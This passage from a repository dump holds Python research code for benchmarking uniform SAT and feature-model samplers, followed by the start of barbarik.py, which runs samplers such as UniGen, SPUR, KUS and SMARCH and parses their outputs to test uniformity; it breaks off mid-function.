try:\n start = time.time()\n output, err, time_out = run_with_timeout_partial(full_cmd_smarch, timeout, cwd='.')\n end = time.time()\n etime = end - start\n #output = op.decode(\"utf-8\")\n print('printing command output:') # for debug only\n print(output) #for debug only\n sampling_times = []\n avg_time = None\n model_count = None\n total_sampling_time = None\n lines = output.splitlines()\n if (len(lines) > 3):\n model_count = extract_pattern('Counting - Total configurations:', lines[3])\n for i in range(4,len(lines)-1):\n t = extract_pattern('sampling time:', 
lines[i])\n if t is not None:\n try:\n st = float(t)\n sampling_times.append(st)\n except ValueError:\n pass\n if (len(sampling_times)>0):\n avg_time = mean(sampling_times)\n total_sampling_time = sum(sampling_times) \n \n\n df_exp = pd.DataFrame({'formula_file' : fla,'timeout': timeout, 'timeout_reached' : time_out, 'execution_time_in': etime, 'total_sampling_time': total_sampling_time, 'avg_sampling_time': avg_time, 'model_count': model_count,'requested_samples': nsamples, 'actual_samples': len(sampling_times)}, index=[0])\n exp_results = exp_results.append(df_exp, ignore_index=True, sort=False)\n \n print(\"DONE\")\n except CalledProcessError:\n print(\"CalledProcessError error\")\n continue\n except Exception as er:\n print(\"OOOPS (unknown exception)\", er)\n continue\n finally:\n if savecsv_onthefly is not None:\n exp_results.to_csv(savecsv_onthefly, index=False)\n\n return exp_results\n\n\n\ndef experiment_DBS(flas, timeout, nsamples, savecsv_onthefly=None):\n output_dir = './dbs_samples'\n exp_results = pd.DataFrame()\n for fla in flas:\n print(fla)\n # prepare the script.a file\n inputFileSuffix = fla.split('/')[-1][:-4]\n tempOutputFile = tempfile.gettempdir() + '/' + inputFileSuffix + \".txt\"\n\n # creating the file to configure the sampler\n dbsConfigFile = tempfile.gettempdir() + '/' + inputFileSuffix + \".a\"\n\n with open(dbsConfigFile, 'w+') as f:\n f.write(\"log \" + tempfile.gettempdir() + '/' + \"output.txt\" + \"\\n\")\n f.write(\"dimacs \" + str(os.path.abspath(fla)) + \"\\n\")\n params = \" solver z3\"+ \"\\n\"\n params += \"hybrid distribution-aware distance-metric:manhattan distribution:uniform onlyBinary:true onlyNumeric:false\"\n params += \" selection:SolverSelection number-weight-optimization:1\"\n params += \" numConfigs:\" + str(nsamples)\n f.write(params + \"\\n\")\n f.write(\"printconfigs \" + tempOutputFile)\n\n cmd = \"mono ./samplers/distribution-aware/CommandLine.exe \"\n # cmd = \"mono ./distribution-aware/CommandLine.exe \"\n cmd += dbsConfigFile\n\n try:\n start = time.time() \n output = check_output(cmd.split(\" \"), stderr=STDOUT, timeout=timeout, encoding='UTF-8')\n print(\"still alive, DONE!\", output)\n # not like Unigen3: it is the expected \"process\"\n end = time.time()\n etime = end - start\n df_exp = pd.DataFrame({'formula_file' : fla, 'timeout' : False, 'execution_time_in': etime, 'exception_dbs': False }, index=[0]) # , 'nsolutions': nsolutions})\n exp_results = exp_results.append(df_exp, ignore_index=True, sort=False)\n \n except TimeoutExpired:\n df_exp = pd.DataFrame({'formula_file' : [fla], 'execution_time_in': [timeout], 'timeout' : [True], 'exception_dbs': [False]}, index=[0])\n exp_results = exp_results.append(df_exp, ignore_index=True, sort=False)\n print(\"TIMEOUT\") \n continue\n except subprocess.CalledProcessError as e:\n print(e.returncode)\n print(e.cmd)\n\n out_dbs = e.output\n if out_dbs is not None:\n if \"Unhandled Exception:\" in out_dbs.splitlines():\n print(\"FAILURE! 
not really a timeout \", out_dbs) # TODO\n end = time.time()\n etime = end - start \n # for dbs, maybe timeout is tristate: true, false, and exception...\n # considering that it is timeout (because it fails to return a solution) but the execution_time_in is not equals to timeout\n # and we set 'exception_dbs': True (false otherwise)\n df_exp = pd.DataFrame({'formula_file' : fla, 'timeout' : True, 'execution_time_in': etime, 'exception_dbs': True }, index=[0]) # , 'nsolutions': nsolutions})\n exp_results = exp_results.append(df_exp, ignore_index=True, sort=False)\n else:\n print(\"unknow case\")\n print(e.output)\n continue\n finally:\n if savecsv_onthefly is not None:\n exp_results.to_csv(savecsv_onthefly, index=False)\n return exp_results\n\n\n\n\n################# Formulas to process\n\n# csv_pattern eg KUS\ndef get_formulas_timeout(resume_folder, csv_pattern):\n flas_dataset = []\n csv_files_results = [join(resume_folder, f) for f in listdir(resume_folder) if isfile(join(resume_folder, f)) and f.endswith(\".csv\") and csv_pattern in f]\n for csv_file_result in csv_files_results:\n df_computations = pd.read_csv(csv_file_result)\n flas_dataset.extend(list(df_computations.query('timeout == True')['formula_file'].values))\n return flas_dataset\n \n\ndef all_cnf_files(folder):\n return [join(folder, f) for f in listdir(folder) if isfile(join(folder, f)) and f.endswith(\".cnf\")]\n\ndef all_dimacs_files(folder):\n return [join(folder, f) for f in listdir(folder) if isfile(join(folder, f)) and f.endswith(\".dimacs\")]\n\n#dataset_fla = { 'fla' : FLA_DATASET_FOLDER, 'fm' : FM_DATASET_FOLDER, 'fmeasy' : FM2_DATASET_FOLDER, 'v15' : FLAV15_DATASET_FOLDER, 'v3' : FLAV3_DATASET_FOLDER, 'v7' : FLAV7_DATASET_FOLDER }\n\ndataset_fla = { 'fla' : FLA_DATASET_FOLDER, 'fm' : FM_DATASET_FOLDER, 'fmeasy' : FM2_DATASET_FOLDER, 'v15' : FLAV15_DATASET_FOLDER, 'blaster' : FLABLASTED_DATASET_FOLDER }\n\n# OUTPUT_DIR='./'\n# useful to store results in a dedicated folder\n# we can mount a volume with Docker so that results are visible outside \nOUTPUT_DIR='usampling-data/' # assume that this folder exists... \n\n \nprint('parsing arguments')\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-t\", \"--timeout\", help=\"timeout for the sampler\", type=int, default=10)\nparser.add_argument(\"-n\", \"--nsamples\", help=\"number of samples\", type=int, default=10)\nparser.add_argument(\"-p\", \"--pthreads\", help=\"number of threads (SMARCH multitprocessing\", type=int, default=3)\nparser.add_argument('-flas','--formulas', nargs=\"+\", help='formulas or feature models to process (cnf or dimacs files typically). 
You can also specify \"FeatureModels\", \"FMEasy\", \"Blasted_Real\", \"V7\", \"V3\", \"V15\", \"Benchmarks\", or \"fm_history_linux_dimacs\" to target specific folders', default=None)\nparser.add_argument(\"--kus\", help=\"enable KUS experiment over ICST benchmarks\", action=\"store_true\")\nparser.add_argument(\"--spur\", help=\"enable SPUR experiment over ICST benchmarks\", action=\"store_true\")\nparser.add_argument(\"--unigen2\", help=\"enable Unigen2 experiment over ICST benchmarks\", action=\"store_true\")\nparser.add_argument(\"--unigen3\", help=\"enable Unigen3 experiment over ICST benchmarks\", action=\"store_true\")\nparser.add_argument(\"--smarch\", help=\"enable SMARCH experiment over FM benchmarks selected from ICST\", action=\"store_true\")\nparser.add_argument(\"--dbs\", help=\"enable distance-based sampling experiment over FM benchmarks selected from ICST\", action=\"store_true\")\nparser.add_argument(\"--smarchmp\", help=\"enable SMARCH MP experiment over FM benchmarks selected from ICST\", action=\"store_true\")\nargs = parser.parse_args()\n\ntimeout=args.timeout\nnsamples=args.nsamples\npthreads=args.pthreads\n\nflas_args = args.formulas\n\nflas_to_process = []\nprint(\"starting usampling bench\")\nif flas_args is not None:\n print(\"formulas to process explicitly given\", flas_args)\n for fla_arg in flas_args:\n if fla_arg in \"fm_history_linux_dimacs\":\n print(\"folder of Linux formulas (SPLC challenge track)\", fla_arg)\n print(\"WARNING: requires the big dataset, use the appropriate Docker image eg macher/usampling:fmlinux\") \n flas_to_process.extend(all_dimacs_files(FMLINUX_DATASET_FOLDER))\n elif fla_arg in \"Benchmarks\":\n print(\"folder of formulas\", fla_arg)\n flas_to_process.extend(all_cnf_files(\"/home/samplingfm/\" + fla_arg)) # TODO: variable for \"/home/samplingfm/\"?\n elif fla_arg in (\"FeatureModels\", \"FMEasy\", \"Blasted_Real\", \"V7\", \"V3\", \"V15\"):\n print(\"folder of formulas\", fla_arg)\n flas_to_process.extend(all_cnf_files(\"/home/samplingfm/Benchmarks/\" + fla_arg)) # fixme: why not FLA_DATASET_FOLDER instead of /home/samplingfm/Benchmarks/\n else:\n print('individual formula', fla_arg)\n flas_to_process.append(fla_arg)\nelse: # by default \n print(\"default dataset/folders\", dataset_fla)\n for dataset_key, dataset_folder in dataset_fla.items():\n flas_to_process.extend(all_cnf_files(dataset_folder))\n\nprint(len(flas_to_process), \"formulas to process\", flas_to_process)\n\nif args.kus:\n print(\"KUS experiment\")\n experiment_KUS(flas=flas_to_process, timeout=timeout, nsamples=nsamples, savecsv_onthefly=OUTPUT_DIR + \"experiments-KUS.csv\")\n\nif args.spur:\n print(\"SPUR experiment\")\n experiment_SPUR(flas=flas_to_process, timeout=timeout, nsamples=nsamples, savecsv_onthefly=OUTPUT_DIR + \"experiments-SPUR.csv\")\n\nif args.unigen3:\n print(\"Unigen3 experiment\")\n experiment_Unigen3(flas=flas_to_process, timeout=timeout, nsamples=nsamples, savecsv_onthefly=OUTPUT_DIR + \"experiments-Unigen3.csv\")\n\nif args.unigen2:\n print(\"Unigen2 experiment\")\n experiment_Unigen2(flas=flas_to_process, timeout=timeout, nsamples=nsamples, savecsv_onthefly=OUTPUT_DIR + \"experiments-Unigen2.csv\")\n\nif args.dbs:\n print(\"DBS experiment\")\n experiment_DBS(flas=flas_to_process, timeout=timeout, nsamples=nsamples, savecsv_onthefly=OUTPUT_DIR + \"experiments-DBS.csv\")\n \nif args.smarch:\n print(\"SMARCH experiment\")\n experiment_SMARCH(flas=flas_to_process, timeout=timeout, nsamples=nsamples, pthreads=pthreads, savecsv_onthefly=OUTPUT_DIR + 
\"experiments-SMARCH.csv\", mp=False)\nif args.smarchmp:\n print(\"SMARCH MP experiment\")\n experiment_SMARCH(flas=flas_to_process, timeout=timeout, nsamples=nsamples, pthreads=pthreads, savecsv_onthefly=OUTPUT_DIR + \"experiments-SMARCH-mp.csv\", mp=True)\n\nprint('end of benchmarks')\n\n#### for debugging run timeout\n#o, e = run_with_timeout('python3 /home/KUS/KUS.py --samples 10 /home/samplingfm/Benchmarks/111.sk_2_36.cnf', TIMEOUT * 2, cwd='/home/KUS/')\n#print(o.decode(\"utf-8\"), \"\\n\\n\", e.decode(\"utf-8\"))\n# print(o, \"\\n\\n\", e)\n#o1, e1 = run_with_timeout('python3 /home/KUS/KUS.py --samples 10 /home/samplingfm/Benchmarks/karatsuba.sk_7_41.cnf', TIMEOUT, cwd='/home/KUS/')\n#print(o1, e1)\n#assert (o1 is None)\n" }, { "alpha_fraction": 0.5461187958717346, "alphanum_fraction": 0.5567381978034973, "avg_line_length": 35.237422943115234, "blob_id": "bcf2644f9ce39427b2936ff23452498b05636237", "content_id": "2dc134e32c461ee7b0dd320107c912e8ba4b9284", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 41057, "license_type": "permissive", "max_line_length": 177, "num_lines": 1133, "path": "/barbarik.py", "repo_name": "diverse-project/BURST", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright (C) 2018 Kuldeep Meel\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; version 2\n# of the License.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA\n# 02110-1301, USA.\n\nfrom __future__ import print_function\nimport sys\nimport os\nimport math\nimport random\nimport argparse\nimport copy\nimport tempfile\nimport pandas as pd\nimport re\n\nSAMPLER_UNIGEN = 1\nSAMPLER_QUICKSAMPLER = 2\nSAMPLER_STS = 3\nSAMPLER_CMS = 4\nSAMPLER_UNIGEN3 = 5\nSAMPLER_SPUR = 6\nSAMPLER_SMARCH = 7\nSAMPLER_UNIGEN2 = 8\nSAMPLER_KUS = 9\nSAMPLER_DISTAWARE = 10\n\nCURR_REF_SAMPLER = 6 # default is SPUR\n\nP_THREADS = 4\n\n# We need a dictionary for Distribution-aware distance sampling\n# which records names and not feature ids in outputted samples\nfeatures_dict = {}\n\n\ndef create_features_dict(inputFile):\n nb_vars = 0\n with open(inputFile, 'r') as f:\n lines = f.readlines()\n for line in lines:\n if line.startswith(\"c\") and not line.startswith(\"c ind\"):\n line = line[0:len(line) - 1]\n _feature = line.split(\" \", 4)\n del _feature[0]\n # handling non-numeric feature IDs, necessary to parse os-like models with $ in feature names...\n if len(_feature) <= 2 and len(_feature) > 0: # needs to deal with literate comments, e.g., in V15 models\n if (_feature[0].isdigit()):\n _feature[0] = int(_feature[0])\n else:\n # num_filter = filter(_feature[0].isdigit(), _feature[0])\n num_feature = \"\".join(c for c in _feature[0] if c.isdigit())\n _feature[0] = int(num_feature)\n # print('key ' + str(_feature[1]) + ' value ' + str(_feature[0])) -- debug\n global features_dict\n features_dict.update({str(_feature[1]): str(_feature[0])})\n elif line.startswith('p cnf'):\n _line = line.split(\" \", 4)\n 
nb_vars = int(_line[2])\n print(\"there are : \" + str(nb_vars) + \" integer variables\")\n if (len(features_dict.keys()) == 0):\n print(\"could not create dict from comments, faking it with integer variables in the 'p cnf' header\")\n for i in range(1, nb_vars + 1):\n # global features_dict\n features_dict.update({str(i): str(i)})\n\n\ndef get_sampler_string(samplerType):\n if samplerType == SAMPLER_UNIGEN:\n return 'UniGen'\n if samplerType == SAMPLER_UNIGEN3:\n return 'UniGen3'\n if samplerType == SAMPLER_QUICKSAMPLER:\n return 'QuickSampler'\n if samplerType == SAMPLER_STS:\n return 'STS'\n if samplerType == SAMPLER_CMS:\n return 'CustomSampler'\n if samplerType == SAMPLER_SPUR:\n return 'SPUR'\n if samplerType == SAMPLER_SMARCH:\n return 'SMARCH'\n if samplerType == SAMPLER_UNIGEN2:\n return 'UNIGEN2'\n if samplerType == SAMPLER_KUS:\n return 'KUS'\n if samplerType == SAMPLER_DISTAWARE:\n return 'DistanceBasedSampling'\n print(\"ERROR: unknown sampler type\")\n exit(-1)\n\n\nclass ChainFormulaSetup:\n def __init__(self, countList, newVarList, indicatorLits):\n self.countList = countList\n self.newVarList = newVarList\n self.indicatorLits = indicatorLits\n\n\ndef check_cnf(fname):\n with open(fname, 'r') as f:\n lines = f.readlines()\n\n given_vars = None\n given_cls = None\n cls = 0\n max_var = 0\n for line in lines:\n line = line.strip()\n\n if len(line) == 0:\n print(\"ERROR: CNF is incorrectly formatted, empty line!\")\n return False\n\n line = line.split()\n line = [l.strip() for l in line]\n\n if line[0] == \"p\":\n assert len(line) == 4\n assert line[1] == \"cnf\"\n given_vars = int(line[2])\n given_cls = int(line[3])\n continue\n\n if line[0] == \"c\":\n continue\n\n cls += 1\n for l in line:\n var = abs(int(l))\n max_var = max(var, max_var)\n\n if max_var > given_vars:\n print(\"ERROR: Number of variables given is LESS than the number of variables ued\")\n print(\"ERROR: Vars in header: %d max var: %d\" % (given_vars, max_var))\n return False\n\n if cls != given_cls:\n print(\"ERROR: Number of clauses in header is DIFFERENT than the number of clauses in the CNF\")\n print(\"ERROR: Claues in header: %d clauses: %d\" % (given_cls, cls))\n return False\n\n return True\n\n\nclass SolutionRetriver:\n\n @staticmethod\n def getSolutionFromSampler(inputFile, numSolutions, samplerType, indVarList, newSeed):\n topass_withseed = (inputFile, numSolutions, indVarList, newSeed)\n ok = check_cnf(inputFile)\n if not ok:\n print(\"ERROR: CNF is malformatted. Sampler may give wrong solutions in this case. 
Exiting.\")\n print(\"File is: %s\" % inputFile)\n exit(-1)\n\n print(\"Using sampler: %s\" % get_sampler_string(samplerType))\n if (samplerType == SAMPLER_UNIGEN):\n sols = SolutionRetriver.getSolutionFromUniGen(*topass_withseed)\n\n elif (samplerType == SAMPLER_UNIGEN3):\n sols = SolutionRetriver.getSolutionFromUniGen3(*topass_withseed)\n\n elif (samplerType == SAMPLER_QUICKSAMPLER):\n sols = SolutionRetriver.getSolutionFromQuickSampler(*topass_withseed)\n\n elif (samplerType == SAMPLER_STS):\n sols = SolutionRetriver.getSolutionFromSTS(*topass_withseed)\n\n elif (samplerType == SAMPLER_CMS):\n sols = SolutionRetriver.getSolutionFromCMSsampler(*topass_withseed)\n\n elif (samplerType == SAMPLER_SPUR):\n sols = SolutionRetriver.getSolutionFromSpur(*topass_withseed)\n\n elif (samplerType == SAMPLER_SMARCH):\n sols = SolutionRetriver.getSolutionFromSMARCH(*topass_withseed)\n\n elif (samplerType == SAMPLER_UNIGEN2):\n sols = SolutionRetriver.getSolutionFromUniGen2(*topass_withseed)\n\n elif (samplerType == SAMPLER_KUS):\n sols = SolutionRetriver.getSolutionFromKUS(*topass_withseed)\n\n elif (samplerType == SAMPLER_DISTAWARE):\n sols = SolutionRetriver.getSolutionFromDistAware(*topass_withseed)\n\n else:\n print(\"Error: No such sampler!\")\n exit(-1)\n\n # clean up the solutions\n for i in range(len(sols)):\n sols[i] = sols[i].strip()\n if sols[i].endswith(' 0'):\n sols[i] = sols[i][:-2]\n\n print(\"Number of solutions returned by sampler:\", len(sols))\n # if args.verbose:\n # print(\"Solutions:\", sols)\n return sols\n\n @staticmethod\n def getSolutionFromUniGen(inputFile, numSolutions, indVarList, newSeed):\n # must construct ./unigen --samples=500 --verbosity=0 --threads=1 CNF-FILE SAMPLESFILE\n inputFileSuffix = inputFile.split('/')[-1][:-4]\n tempOutputFile = tempfile.gettempdir() + '/' + inputFileSuffix + \".txt\"\n\n cmd = './samplers/unigen --samples=' + str(numSolutions)\n cmd += ' ' + inputFile + ' ' + str(tempOutputFile) + ' > /dev/null 2>&1'\n if args.verbose:\n print(\"cmd: \", cmd)\n os.system(cmd)\n\n with open(tempOutputFile, 'r') as f:\n lines = f.readlines()\n\n solList = []\n for line in lines:\n line = line.strip()\n if line.startswith('v'):\n freq = int(line.split(':')[-1])\n for i in range(freq):\n solList.append(line.split(':')[0].replace('v', '').strip())\n if (len(solList) == numSolutions):\n break\n if (len(solList) == numSolutions):\n break\n solreturnList = solList\n if (len(solList) > numSolutions):\n solreturnList = random.sample(solList, numSolutions)\n\n os.unlink(str(tempOutputFile))\n return solreturnList\n\n @staticmethod\n def getSolutionFromUniGen2(inputFile, numSolutions, indVarList, newSeed):\n\n inputFileSuffix = inputFile.split('/')[-1][:-4]\n tempOutputFile = tempfile.gettempdir() + '/' + inputFileSuffix + \".txt\"\n cwd = os.getcwd()\n cmd = 'python3 UniGen2.py -samples=' + str(numSolutions)\n cmd += ' ' + str(os.path.abspath(inputFile)) + ' ' + str(tempfile.gettempdir()) + ' > /dev/null 2>&1'\n if args.verbose:\n print(\"cmd: \", cmd)\n os.chdir(str(os.getcwd()) + '/samplers')\n os.system(cmd)\n os.chdir(str(cwd))\n\n with open(tempOutputFile, 'r') as f:\n lines = f.readlines()\n\n solList = []\n for line in lines:\n line = line.strip()\n if line.startswith('v'):\n freq = int(line.split(':')[-1])\n for i in range(freq):\n solList.append(line.split(':')[0].replace('v', '').strip())\n if (len(solList) == numSolutions):\n break\n if (len(solList) == numSolutions):\n break\n solreturnList = solList\n if (len(solList) > numSolutions):\n solreturnList = 
random.sample(solList, numSolutions)\n\n os.unlink(str(tempOutputFile))\n return solreturnList\n\n @staticmethod\n def getSolutionFromKUS(inputFile, numSolutions, indVarList, newSeed):\n\n inputFileSuffix = inputFile.split('/')[-1][:-4]\n tempOutputFile = tempfile.gettempdir() + '/' + inputFileSuffix + \".txt\"\n cwd = os.getcwd()\n cmd = 'python3 KUS.py --samples=' + str(numSolutions) + ' ' + '--outputfile ' + tempOutputFile\n cmd += ' ' + str(os.path.abspath(inputFile)) + ' > /dev/null 2>&1'\n if args.verbose:\n print(\"cmd: \", cmd)\n os.chdir(str(os.getcwd()) + '/samplers')\n os.system(cmd)\n os.chdir(str(cwd))\n\n with open(tempOutputFile, 'r') as f:\n lines = f.readlines()\n\n solList = []\n\n for line in lines:\n sol = re.sub('[0-9]*,', '', line)\n solList.append(sol)\n\n os.unlink(str(tempOutputFile))\n\n return solList\n\n @staticmethod\n def getSolutionFromUniGen3(inputFile, numSolutions, indVarList, newSeed):\n # must construct: ./approxmc3 -s 1 -v2 --sampleout /dev/null --samples 500\n inputFileSuffix = inputFile.split('/')[-1][:-4]\n tempOutputFile = tempfile.gettempdir() + '/' + inputFileSuffix + \".txt\"\n\n cmd = './samplers/approxmc3 -s ' + str(int(newSeed)) + ' -v 0 --samples ' + str(numSolutions)\n cmd += ' --sampleout ' + str(tempOutputFile)\n cmd += ' ' + inputFile + ' > /dev/null 2>&1'\n if args.verbose:\n print(\"cmd: \", cmd)\n os.system(cmd)\n\n with open(tempOutputFile, 'r') as f:\n lines = f.readlines()\n\n solList = []\n for line in lines:\n line = line.strip()\n freq = int(line.split(':')[0])\n for i in range(freq):\n solList.append(line.split(':')[1].strip())\n if len(solList) == numSolutions:\n break\n if len(solList) == numSolutions:\n break\n\n solreturnList = solList\n if len(solList) > numSolutions:\n solreturnList = random.sample(solList, numSolutions)\n\n os.unlink(str(tempOutputFile))\n return solreturnList\n\n @staticmethod\n def getSolutionFromDistAware(inputFile, numSolutions, indVarList, newSeed):\n\n inputFileSuffix = inputFile.split('/')[-1][:-4]\n tempOutputFile = tempfile.gettempdir() + '/' + inputFileSuffix + \".txt\"\n\n # creating the file to configure the sampler\n dbsConfigFile = tempfile.gettempdir() + '/' + inputFileSuffix + \".a\"\n\n with open(dbsConfigFile, 'w+') as f:\n f.write(\"log \" + tempfile.gettempdir() + '/' + \"output.txt\" + \"\\n\")\n f.write(\"dimacs \" + str(os.path.abspath(inputFile)) + \"\\n\")\n params = \" solver z3\" + \"\\n\"\n params += \"hybrid distribution-aware distance-metric:manhattan distribution:uniform onlyBinary:true onlyNumeric:false\"\n params += \" selection:SolverSelection number-weight-optimization:1\"\n params += \" numConfigs:\" + str(numSolutions)\n f.write(params + \"\\n\")\n f.write(\"printconfigs \" + tempOutputFile)\n\n cmd = \"mono ./samplers/distribution-aware/CommandLine.exe \"\n cmd += dbsConfigFile\n\n if args.verbose:\n print(\"cmd: \", cmd)\n os.system(cmd)\n\n with open(tempOutputFile, 'r') as f:\n lines = f.readlines()\n\n solList = []\n\n for line in lines:\n features = re.findall(\"%\\w+%\", line)\n sol = []\n\n for feature in features:\n feat = feature[1:-1]\n sol.append(feat)\n\n solution = ''\n\n for k, v in features_dict.items():\n if k in sol:\n solution += ' ' + str(v)\n else:\n solution += ' -' + str(v)\n solList.append(solution)\n\n # cleaning temporary files\n os.unlink(str(tempOutputFile))\n os.unlink(dbsConfigFile)\n os.unlink(str(tempfile.gettempdir()) + '/' + \"output.txt\")\n os.unlink(str(tempfile.gettempdir()) + '/' + \"output.txt_error\")\n\n return solList\n\n 
@staticmethod\n def getSolutionFromQuickSampler(inputFile, numSolutions, indVarList, newSeed):\n cmd = \"./samplers/quicksampler -n \" + str(numSolutions * 5) + ' ' + str(inputFile) + ' > /dev/null 2>&1'\n if args.verbose:\n print(\"cmd: \", cmd)\n os.system(cmd)\n cmd = \"./samplers/z3-quicksampler/z3 sat.quicksampler_check=true sat.quicksampler_check.timeout=3600.0 \" + str(\n inputFile) + ' > /dev/null 2>&1'\n # os.system(cmd)\n\n # cmd = \"./samplers/z3 \"+str(inputFile)#+' > /dev/null 2>&1'\n if args.verbose:\n print(\"cmd: \", cmd)\n os.system(cmd)\n if (numSolutions > 1):\n i = 0\n\n with open(inputFile + '.samples', 'r') as f:\n lines = f.readlines()\n\n with open(inputFile + '.samples.valid', 'r') as f:\n validLines = f.readlines()\n\n solList = []\n for j in range(len(lines)):\n if (validLines[j].strip() == '0'):\n continue\n fields = lines[j].strip().split(':')\n sol = ''\n i = 0\n # valutions are 0 and 1 and in the same order as c ind.\n for x in list(fields[1].strip()):\n if (x == '0'):\n sol += ' -' + str(indVarList[i])\n else:\n sol += ' ' + str(indVarList[i])\n i += 1\n solList.append(sol)\n if (len(solList) == numSolutions):\n break\n\n os.unlink(inputFile + '.samples')\n os.unlink(inputFile + '.samples.valid')\n\n if len(solList) != numSolutions:\n print(\"Did not find required number of solutions\")\n sys.exit(1)\n\n return solList\n\n @staticmethod\n def getSolutionFromSpur(inputFile, numSolutions, indVarList, newSeed):\n inputFileSuffix = inputFile.split('/')[-1][:-4]\n tempOutputFile = tempfile.gettempdir() + '/' + inputFileSuffix + \".out\"\n cmd = './samplers/spur -seed %d -q -s %d -out %s -cnf %s' % (\n newSeed, numSolutions, tempOutputFile, inputFile)\n if args.verbose:\n print(\"cmd: \", cmd)\n os.system(cmd)\n\n with open(tempOutputFile, 'r') as f:\n lines = f.readlines()\n\n solList = []\n startParse = False\n for line in lines:\n if (line.startswith('#START_SAMPLES')):\n startParse = True\n continue\n if (not (startParse)):\n continue\n if (line.startswith('#END_SAMPLES')):\n startParse = False\n continue\n fields = line.strip().split(',')\n solCount = int(fields[0])\n sol = ' '\n i = 1\n for x in list(fields[1]):\n if (x == '0'):\n sol += ' -' + str(i)\n else:\n sol += ' ' + str(i)\n i += 1\n for i in range(solCount):\n solList.append(sol)\n\n os.unlink(tempOutputFile)\n return solList\n\n @staticmethod\n def getSolutionFromSTS(inputFile, numSolutions, indVarList, newSeed):\n kValue = 50\n samplingRounds = numSolutions / kValue + 1\n inputFileSuffix = inputFile.split('/')[-1][:-4]\n outputFile = tempfile.gettempdir() + '/' + inputFileSuffix + \".out\"\n cmd = './samplers/STS -k=' + str(kValue) + ' -nsamples=' + str(samplingRounds) + ' ' + str(inputFile)\n cmd += ' > ' + str(outputFile)\n if args.verbose:\n print(\"cmd: \", cmd)\n os.system(cmd)\n\n with open(outputFile, 'r') as f:\n lines = f.readlines()\n\n solList = []\n shouldStart = False\n # baseList = {}\n for j in range(len(lines)):\n if (lines[j].strip() == 'Outputting samples:' or lines[j].strip() == 'start'):\n shouldStart = True\n continue\n if (lines[j].strip().startswith('Log') or lines[j].strip() == 'end'):\n shouldStart = False\n if (shouldStart):\n\n '''if lines[j].strip() not in baseList:\n baseList[lines[j].strip()] = 1\n else:\n baseList[lines[j].strip()] += 1'''\n sol = ''\n i = 0\n # valutions are 0 and 1 and in the same order as c ind.\n for x in list(lines[j].strip()):\n if (x == '0'):\n sol += ' -' + str(indVarList[i])\n else:\n sol += ' ' + str(indVarList[i])\n i += 1\n 
solList.append(sol)\n if len(solList) == numSolutions:\n break\n\n if len(solList) != numSolutions:\n print(len(solList))\n print(\"STS Did not find required number of solutions\")\n sys.exit(1)\n\n os.unlink(outputFile)\n return solList\n\n @staticmethod\n def getSolutionFromCMSsampler(inputFile, numSolutions, indVarList, newSeed):\n inputFileSuffix = inputFile.split('/')[-1][:-4]\n outputFile = tempfile.gettempdir() + '/' + inputFileSuffix + \".out\"\n cmd = \"./samplers/cryptominisat5 --restart luby --maple 0 --verb 10 --nobansol\"\n cmd += \" --scc 1 -n1 --presimp 0 --polar rnd --freq 0.9999\"\n cmd += \" --random \" + str(int(newSeed)) + \" --maxsol \" + str(numSolutions)\n cmd += \" \" + inputFile\n cmd += \" --dumpresult \" + outputFile + \" > /dev/null 2>&1\"\n\n if args.verbose:\n print(\"cmd: \", cmd)\n os.system(cmd)\n\n with open(outputFile, 'r') as f:\n lines = f.readlines()\n\n solList = []\n for line in lines:\n if line.strip() == 'SAT':\n continue\n\n sol = \"\"\n lits = line.split(\" \")\n for y in indVarList:\n if str(y) in lits:\n sol += ' ' + str(y)\n\n if \"-\" + str(y) in lits:\n sol += ' -' + str(y)\n solList.append(sol)\n\n solreturnList = solList\n if len(solList) > numSolutions:\n solreturnList = random.sample(solList, numSolutions)\n if len(solList) < numSolutions:\n print(\"cryptominisat5 Did not find required number of solutions\")\n sys.exit(1)\n os.unlink(outputFile)\n return solreturnList\n\n @staticmethod\n def getSolutionFromSMARCH(inputFile, numSolutions, indVarList, newSeed):\n cmd = \"python3 ./samplers/smarch_mp.py -p \" + str(P_THREADS) + \" -o \" + os.path.dirname(\n inputFile) + \" \" + inputFile + \" \" + str(numSolutions) + \" > /dev/null 2>&1\"\n # cmd = \"python3 /home/gilles/ICST2019-EMSE-Ext/Kclause_Smarch-local/Smarch/smarch.py \" + \" -o \" + os.path.dirname(inputFile) + \" \" + inputFile + \" \" + str(numSolutions)\n if args.verbose:\n print(\"cmd: \", cmd)\n os.system(cmd)\n # if (numSolutions > 1):\n # i = 0\n solList = []\n tempFile = inputFile.replace('.cnf', '_' + str(numSolutions)) + '.samples'\n if args.verbose:\n print(tempFile)\n\n df = pd.read_csv(tempFile, header=None)\n\n # with open(inputFile+'.samples', 'r') as f:\n # lines = f.readlines()\n for x in df.values:\n # tmpLst = []\n lst = x.tolist()\n sol = ''\n for i in lst:\n if not math.isnan(i):\n sol += ' ' + str(int(i))\n # tmpList = [str(int(i)) for i in lst if not math.isnan(i)]\n # if args.verbose:\n # print(sol)\n\n # solList.append(tmpList)\n # solList = [x for x in df.values]\n os.unlink(tempFile)\n solList.append(sol)\n\n return solList\n\n\n# returns List of Independent Variables\ndef parseIndSupport(indSupportFile):\n with open(indSupportFile, 'r') as f:\n lines = f.readlines()\n\n indList = []\n numVars = 0\n for line in lines:\n if line.startswith('p cnf'):\n fields = line.split()\n numVars = int(fields[2])\n\n if line.startswith('c ind'):\n line = line.strip().replace('c ind', '').replace(' 0', '').strip().replace('v ', '')\n indList.extend(line.split())\n\n if len(indList) == 0:\n indList = [int(x) for x in range(1, numVars + 1)]\n else:\n indList = [int(x) for x in indList]\n return indList\n\n\ndef chainFormulaSetup(sampleSol, unifSol, numSolutions):\n # number of solutions for each: k1, k2, k3\n # TODO rename to chainSolutions\n countList = [5, 5, 5]\n\n # chain formula number of variables for each\n # TODO rename to chainVars\n newVarList = [4, 4, 4]\n\n ##########\n # clean up the solutions\n ##########\n sampleSol = sampleSol[0].strip()\n if 
